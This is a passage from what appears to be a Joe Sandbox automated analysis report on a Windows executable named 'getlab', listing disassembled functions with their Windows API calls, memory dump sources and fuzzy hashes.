                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: NoModify
                                                                          • API String ID: 3702945584-1699962838
                                                                          • Opcode ID: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                                          • Instruction ID: 1140eb4c3ce40d11de990e217cdc8ecc45d3a806a677c2547659d4957ea667b8
                                                                          • Opcode Fuzzy Hash: 7eb4ab459c3921dc5338c7b3abf7fd5903c54a3e898984c04107b97a88657072
                                                                          • Instruction Fuzzy Hash: C6E04FB4640308BFEB04DB55DD4AF6AB7ECDB48724F104059BA049B280E674FE00C669
                                                                          Function 0042DE14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          Strings
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0042DE2E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID: System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 71445658-1109719901
                                                                          • Opcode ID: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                                          • Instruction ID: d7cc6eff87d81a3ef1983a0911a62a1ada5c46f4ff843c2b0821017aeb54f6c2
                                                                          • Opcode Fuzzy Hash: 3bdcab3ffa95dd7854a6d474c2ff8c4d7b332cac827883cc7250e5693ef667ec
                                                                          • Instruction Fuzzy Hash: 88D0C972910228BBEB00DE89DC41DFB77ADDB19760F45802AFD04AB241C6B4EC519BF8
                                                                          Function 0047DABC Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047DD9B,?,-0000001A,0047FC14,-00000010,?,00000004,0000001B,00000000,0047FF61,?,0045D988), ref: 0047DB32
                                                                            • Part of subcall function 0042E314: 73A1A570.USER32(00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 0042E323
                                                                            • Part of subcall function 0042E314: EnumFontsA.GDI32(?,00000000,0042E300,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E34E
                                                                            • Part of subcall function 0042E314: 73A1A480.USER32(00000000,?,0042E373,00000000,00000000,0042E36C,?,00000000,00000000,0047FFC8,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                          • SendNotifyMessageA.USER32(0001043E,00000496,00002711,-00000001), ref: 0047DD02
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                                          • String ID:
                                                                          • API String ID: 2685184028-0
                                                                          • Opcode ID: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                          • Instruction ID: 990e0cae6f69a79882f0940071147895bcf3dc4f71101f62f717fb2ce75f629c
                                                                          • Opcode Fuzzy Hash: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                                          • Instruction Fuzzy Hash: FD517074A101008BCB21EF26E98169637B9EF94308B50C57BA8499F367C778ED46CB9D
                                                                          Function 0042DEB8 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DF64
                                                                          • RegCloseKey.ADVAPI32(?,0042DFD5,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DFC8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnum
                                                                          • String ID:
                                                                          • API String ID: 2818636725-0
                                                                          • Opcode ID: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                                          • Instruction ID: c872a63f9528d4f9380aaceb5e2d891e8c563da0940016be03c3acb485ce214c
                                                                          • Opcode Fuzzy Hash: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                                          • Instruction Fuzzy Hash: A8319370F04258AEDB11DFA6DD42BBFBBB9EB49304F92447BE401E6281D6385E01CA1D
                                                                          Function 00494F90 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00494A14: 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                                            • Part of subcall function 00494A14: SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                                            • Part of subcall function 00494A14: GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                                            • Part of subcall function 00494A14: GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                                            • Part of subcall function 00494A14: 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                                          • MulDiv.KERNEL32(?,?,00000006), ref: 00495007
                                                                          • MulDiv.KERNEL32(?,?,0000000D), ref: 0049501C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Text$A480A570ExtentMetricsObjectPointSelect
                                                                          • String ID:
                                                                          • API String ID: 2611416588-0
                                                                          • Opcode ID: 37661e4e4744765c0b7c9b488209f7c76f6be10e0f1b2c2e0cd71cc3417df9e3
                                                                          • Instruction ID: 77e147d69b9064f8ac972dc5ec612a4c31b0b2151bcda952f861b73a488bb2cf
                                                                          • Opcode Fuzzy Hash: 37661e4e4744765c0b7c9b488209f7c76f6be10e0f1b2c2e0cd71cc3417df9e3
                                                                          • Instruction Fuzzy Hash: 2C21D6713012009FDB50DE69C8C5EA637A9EB89314F1446B9FD08CF29ADB35EC058BA9
                                                                          Function 004527BC Relevance: 3.1, APIs: 2, Instructions: 60processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452810
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452818
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 2919029540-0
                                                                          • Opcode ID: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                                          • Instruction ID: e9b66965f7ed38539142cc2995e542ed63b4c0771d7d6ba66a5e4ac3981b0267
                                                                          • Opcode Fuzzy Hash: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                                          • Instruction Fuzzy Hash: 70113C72604608AF8B50DEADDD41D9FB7ECEB4D310B114567FD18D3241D674AD148BA8
                                                                          Function 0040AFC0 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFDA
                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B137,00000000,0040B14F,?,?,?,00000000), ref: 0040AFEB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindFree
                                                                          • String ID:
                                                                          • API String ID: 4097029671-0
                                                                          • Opcode ID: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                          • Instruction ID: aeeba5ce467f8effdb78304bcd792b874f75604bed8582862ca5d9c37e282381
                                                                          • Opcode Fuzzy Hash: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                                          • Instruction Fuzzy Hash: CE01DF71700700AFDB14EF65AC92A1B77ADDB4A714B11807AF400AB3D1DA39AC019AA9
                                                                          Function 0041EE9C Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                          • 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A25940CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2655091166-0
                                                                          • Opcode ID: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                          • Instruction ID: ec06e6b8def62778297c6a117e91140491810bf1675edd7fb5fc45fb14f34894
                                                                          • Opcode Fuzzy Hash: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                                          • Instruction Fuzzy Hash: D9015B76A04604BFD706CF6BDC1199ABBE8E789720B22887BEC04D3690E6355810DF18
                                                                          Function 00452C54 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452C96
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452CBC), ref: 00452C9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID:
                                                                          • API String ID: 55378915-0
                                                                          • Opcode ID: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                          • Instruction ID: 72322736c602c8c7a1920fbe291f5aeb87443d44c1116871956ce6e3077d7411
                                                                          • Opcode Fuzzy Hash: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                                          • Instruction Fuzzy Hash: C9012671B00604AB8B01EB799D4189EB7ECDB4A32575045BBFC14E3343EA784E04456C
                                                                          Function 00452744 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527A3), ref: 0045277D
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004527A3), ref: 00452785
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                          • Instruction ID: e798b8fcaf2c893210dd6dd972d3083c0fc79cae1e6532b7171fe4e83a13409b
                                                                          • Opcode Fuzzy Hash: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                                          • Instruction Fuzzy Hash: E1F02871A04604BFCB00EF759E4159EB3E8DB0E721B1045B7FC04E3242E7B94E048598
                                                                          Function 00423234 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
                                                                          • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CursorLoad
                                                                          • String ID:
                                                                          • API String ID: 3238433803-0
                                                                          • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                          • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                                          • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                          • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                                          Function 0042E38C Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                          • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                                          • Opcode Fuzzy Hash: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                                          • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                                          Function 004162C2 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004162D9
                                                                          • GetClassInfoA.USER32(00000000,?,?), ref: 004162E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ClassInfo
                                                                          • String ID:
                                                                          • API String ID: 3534257612-0
                                                                          • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                          • Instruction ID: 6cd5cb93a67b39dfae17eda9b7884797c0ece5161c54fd1178b0752c2523ee83
                                                                          • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                          • Instruction Fuzzy Hash: C7E01AB26015146EE710DFA89D81EE73BDCDB08350B2201B7FE08CB246D3A4DD008BA8
                                                                          Function 004508CC Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508E2
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508EA
                                                                            • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                                          • Instruction ID: 7f4ce0808efc90522886b7fd4f7afe0cb5ca5dcd319eb65f5abb6fc959a7204b
                                                                          • Opcode Fuzzy Hash: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                                          • Instruction Fuzzy Hash: BDE012A93542005FE700FA7589C1F2B22DCDB44315F00846AF945CA183D678CC054B69
                                                                          Function 0040625C Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocLock
                                                                          • String ID:
                                                                          • API String ID: 15508794-0
                                                                          • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                          • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                          • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                          • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                          Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                          • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                          • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                          • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                          Function 004085CC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                                            • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
